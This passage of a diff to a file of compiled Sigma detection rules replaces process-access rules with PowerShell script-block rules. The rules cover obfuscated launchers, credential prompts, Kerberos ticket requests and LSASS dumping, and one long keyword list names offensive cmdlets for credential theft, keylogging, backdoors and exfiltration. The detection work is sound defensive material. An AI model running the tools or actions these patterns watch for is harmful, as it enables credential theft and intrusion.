'%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", - "attack.t1106" + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": 